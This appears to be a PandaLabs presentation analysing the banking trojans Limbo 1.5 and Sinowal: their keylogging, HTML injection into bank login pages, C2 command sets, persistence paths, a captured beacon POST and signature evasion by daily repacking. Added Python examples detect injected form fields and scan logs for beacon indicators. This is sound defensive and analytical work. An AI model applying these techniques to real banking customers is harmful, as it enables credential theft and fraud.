Banking Targeted Attack Techniques


Pedro Bustamante
Sr. Research Advisor, PandaLabs

Case I: Limbo 1.5

• First discovered January 20, 2007 via the "Targeted Attack Alert Services" of PandaLabs.
• Affects multiple financial institutions.
• Now detected as Trj/Bakolimb.A.
• Consists of 3 main components:
  • Helper.XML
  • Helper.DLL
  • Control Server and Control Panel
Limbo 1.5
Helper.XML
• Configuration file containing the code to inject.
• Defines the HTML code injection per institution.
• Optional parameters (block, check, quan, content).
Limbo 1.5
Helper.DLL

Installs as an Internet Explorer Browser Helper Object (BHO)
• Monitors all browsing activity.
• Monitors the CortalConsors.de online broker by default.

Keylogger functionality
• Also harvests Windows Protected Storage (saved passwords).
• Deletes cookies.
• Drops the captured information in a text file.
• The dump differs depending on the variant.
Limbo 1.5
Helper.DLL
• New variants daily to avoid signature detection by AV engines.
• In a single day it is normal to see 6 different variants.
• Only small changes between variants, as shown by their Win32 API calls.
Limbo 1.5
Helper.DLL Variants

• Point-and-click utility to create variants.
• User defines the download URL and the runtime packer to use.
• Can distribute new undetected variants very easily.
Limbo 1.5
Helper.DLL

• Creates a UniqueID (UID) per infected machine.
• Uses this UID to communicate with the Control Server and to receive commands from it.
• Client <-> server communication via PHP scripts.
• Sends the captured text file as soon as it connects.
• Commands.php executes commands remotely:
  • Download
  • Update
  • DeleteCookies
  • CopyBofAKeys / DeleteBofAKeys
  • Run
  • LoadXML
  • Reboot
  • KillWin
  • KillWinAndReboot
Limbo 1.5
Remote Control Panel
• Filter by COUNTRY, IP or UID.
• View captured logs, delete logs, execute commands, …

Limbo 1.5
Remote Control Panel
• Command execution and monitoring.
• Commands are queued in case the client is not connected.

Command executed on 12/3/2007 instructing the PCs to download "downloader", which in turn downloads Trj/Spammer.ZO and Adware/Bravesentry.
Limbo 1.5
Remote Control Panel
• Infection logs and statistics.
• Approximately 2000 new infected PCs per day.
Limbo 1.5
Remote Control Panel
• The Trojan is sold as a customized "kit"; we found several servers using this kit.
• Hidden password functionality.
Limbo 1.5
Remote Control Panel
• Utility to create and print credit cards.
• Stolen credit card data.

Case II: Sinowal

• First discovered March 7, 2007 via the "Targeted Attack Alert Services" of PandaLabs.
• Affects multiple financial institutions.
• Now detected as a Trj/Sinowal variant.
• Most interesting characteristics:
  • Custom-made runtime packer
  • Trojan-independent monitoring of bank URLs
Sinowal
Custom-made Runtime Packer
• Not detected by internal tools or by competing AVs.
• Unpacking utilities could not unpack it.
• Manual investigation found a typical packer OEP (original entry point).
• Manually unpacking it reveals new "control and communication servers".
• A few days later: a brand new, unknown packing algorithm.
Sinowal
Remote “JIT” Monitoring Functionality

• Most Trojans embed the bank address to monitor and the HTML code to inject inside their binary code.
• Sinowal introduces a new technique that helps it:
  • Remain undetected by routine binary analysis.
  • Update its targets and code injection without updating the binary.
• How it works:
  1. Upon infection, inserts a "Shell" value into HKLM\...\Run pointing to
     %ProgramFilesRoot%\Common Files\Microsoft Shared\Web Folders\ibm00003.exe
  2. Drops IBM00002.DLL and IBM00003.DLL into the same directory; both are injected into the Explorer.exe process.
  3. The infected client sends each visited URL, encrypted, to the malicious server.
  4. The malicious server only responds to a specific "User-Agent" string.
  5. The malicious server responds with the HTML code to inject.
  6. The unsuspecting user sees a modified bank login page.
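Both families end in the same place: Limbo with the static per-institution HTML from Helper.XML, Sinowal with HTML fetched from its server at browse time, and in each case the victim's browser renders a login form with fields the genuine page never had. The check below is an added example, not code from the slides or from PandaLabs. It parses the login form as the browser rendered it and reports every input name (and any changed form action) that the genuine form does not define. The bank, the field names, the 203.0.113.9 collection address and all three HTML snippets are constructed for the example.

```python
"""Detect fields injected into a bank login form.

Added example, not code from the PandaLabs slides. It parses the login form
as the victim's browser rendered it and compares the input names (and the
form action) with those of the genuine page. The institution, the field
names and every HTML snippet below are constructed for the example.
"""
from html.parser import HTMLParser


class FormFields(HTMLParser):
    """Collect the action and the named inputs of every <form> in a page."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""), "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            name = a.get("name", "")
            # Submit buttons carry no user data; every other named control is a field.
            if name and a.get("type", "").lower() != "submit":
                self._current["fields"].append(name)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def extract_forms(html):
    parser = FormFields()
    parser.feed(html)
    parser.close()
    return parser.forms


def injected_fields(rendered_html, expected_fields, expected_action):
    """Report forms whose inputs or action differ from the genuine login form.

    Returns a list of {"action": ..., "extra": [...]} dicts; an empty list
    means the rendered page matches the genuine one.
    """
    findings = []
    for form in extract_forms(rendered_html):
        extra = [f for f in form["fields"] if f not in expected_fields]
        if extra or form["action"] != expected_action:
            findings.append({"action": form["action"], "extra": extra})
    return findings


# Constructed: the genuine login form of a hypothetical bank.
GENUINE_LOGIN = """<form action="/login" method="post">
<input name="user"><input type="password" name="pass">
<input type="submit" value="Log in"></form>"""

# Constructed: the same page after HTML injection added PIN and TAN fields.
INJECTED_LOGIN = """<form action="/login" method="post">
<input name="user"><input type="password" name="pass">
<input type="password" name="pin"><input name="tan1"><input name="tan2">
<input type="submit" value="Log in"></form>"""

# Constructed: injection that keeps the fields but points the form elsewhere
# (203.0.113.9 is a documentation address, not a real server).
REDIRECTED_LOGIN = """<form action="http://203.0.113.9/collect.php" method="post">
<input name="user"><input type="password" name="pass">
<input type="submit" value="Log in"></form>"""

EXPECTED_FIELDS = {"user", "pass"}
EXPECTED_ACTION = "/login"


if __name__ == "__main__":
    for label, page in (("genuine", GENUINE_LOGIN), ("injected", INJECTED_LOGIN),
                        ("redirected", REDIRECTED_LOGIN)):
        print(label, injected_fields(page, EXPECTED_FIELDS, EXPECTED_ACTION))
```

The comparison has to run where the injected DOM is visible: in an endpoint agent, a browser extension, or page-integrity JavaScript the bank ships with its login page. Server-side logs never see the injection itself, because it happens after the response has left the bank; what the server can see, if the injected form still submits to the genuine action, is unexpected field names such as pin or tan1 arriving in the login POST, which is a cheap second check.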

Sinowal
Remote “JIT” Monitoring Functionality

• Infected client -> malicious server
  • Monitors browsing activity.
  • Sends the encrypted URL to the server in a POST such as:

    POST /gamma/x25.php?
        id=2E0345322FDD1D09C728CC9840F922FA
        &sv=53
        &build=Build%20VASi
        &ts=1130334165
        &ip=192.168.200.27
        &sport=3891
        &hport=4011
        &os=5.1.2600
        &cn=Norway
        HTTP/1.1

  • Static User-Agent: Mozilla/4.0
  • Static Content-Type boundary of "--swefasvqdvwxff"
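The captured request carries three constants that do not change when the binary is repacked: the parameter set (id, sv, build, ts, ip, sport, hport, os, cn), the bare "Mozilla/4.0" User-Agent and the multipart boundary "--swefasvqdvwxff". The scanner below is an added example, not code from the slides or from PandaLabs; it scores each request in a log against those indicators plus the 32-hex shape of the id. The tab-separated log format (client, method, URL, User-Agent, Content-Type) is an assumption, every log line is constructed, and 203.0.113.9 is a documentation address standing in for the real server.

```python
"""Flag Sinowal-style C2 beacons in an HTTP request log.

Added example, not code from the PandaLabs slides. It scores each request
against the constants visible in the captured POST: the id/sv/build/ts/ip/
sport/hport/os/cn parameter set, a 32-hex id, the bare "Mozilla/4.0"
User-Agent and the static multipart boundary "swefasvqdvwxff". The log
format (tab-separated: client, method, URL, User-Agent, Content-Type) and
every log line below are constructed; 203.0.113.9 is a documentation address.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Parameter names seen in the captured Sinowal POST.
BEACON_PARAMS = {"id", "sv", "build", "ts", "ip", "sport", "hport", "os", "cn"}
STATIC_UA = "Mozilla/4.0"
STATIC_BOUNDARY = "swefasvqdvwxff"
UID_RE = re.compile(r"^[0-9A-Fa-f]{32}$")


def score_request(method, url, headers):
    """Return (score, reasons) for one request; each matched indicator adds 1."""
    reasons = []
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    present = BEACON_PARAMS & set(query)
    # A near-complete parameter set on a POST to a PHP script is the core indicator.
    if method == "POST" and parts.path.endswith(".php") and len(present) >= 7:
        reasons.append("beacon parameter set (%d of %d)" % (len(present), len(BEACON_PARAMS)))
    if query.get("id") and UID_RE.match(query["id"][0]):
        reasons.append("32-hex client id")
    if headers.get("user-agent", "").strip() == STATIC_UA:
        reasons.append("bare Mozilla/4.0 User-Agent")
    if STATIC_BOUNDARY in headers.get("content-type", ""):
        reasons.append("static multipart boundary")
    return len(reasons), reasons


def scan_log(text, threshold=2):
    """Return (client, url, reasons) for every log line scoring at or above threshold."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        client, method, url, ua, ctype = line.split("\t")
        score, reasons = score_request(method, url, {"user-agent": ua, "content-type": ctype})
        if score >= threshold:
            hits.append((client, url, reasons))
    return hits


# Constructed log: one beacon (the POST from the slide), one normal IE6 page
# load and one ordinary PHP form post that shares two parameter names.
SAMPLE_LOG = (
    "10.0.0.5\tPOST\thttp://203.0.113.9/gamma/x25.php?"
    "id=2E0345322FDD1D09C728CC9840F922FA&sv=53&build=Build%20VASi&ts=1130334165"
    "&ip=192.168.200.27&sport=3891&hport=4011&os=5.1.2600&cn=Norway"
    "\tMozilla/4.0\tmultipart/form-data; boundary=--swefasvqdvwxff\n"
    "10.0.0.6\tGET\thttp://www.example-bank.test/login"
    "\tMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\t-\n"
    "10.0.0.7\tPOST\thttp://www.example-bank.test/login.php?id=abc&sv=1"
    "\tMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\tapplication/x-www-form-urlencoded\n"
)


if __name__ == "__main__":
    for client, url, reasons in scan_log(SAMPLE_LOG):
        print(client, url.split("?")[0], "; ".join(reasons))
```

Two practical points follow from the slide. The server answers only the hard-coded User-Agent, so replaying the POST with curl or from a sandbox that rewrites the header returns nothing; use the captured value when pulling the injected HTML for analysis. And these constants live in the protocol rather than in the packer, so they survive the daily re-packing described for Limbo and outlast any byte signature on the binary.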

Banking Targeted Attack Techniques
• Bank-specific custom attacks
  • Evade AV signature detection easily
  • Multiple variants per day
  • Custom runtime packing techniques
• Control Panels sold as "kits"
• Remote monitoring of browsing
Thanks!!
Panda Research Blog: http://research.pandasoftware.com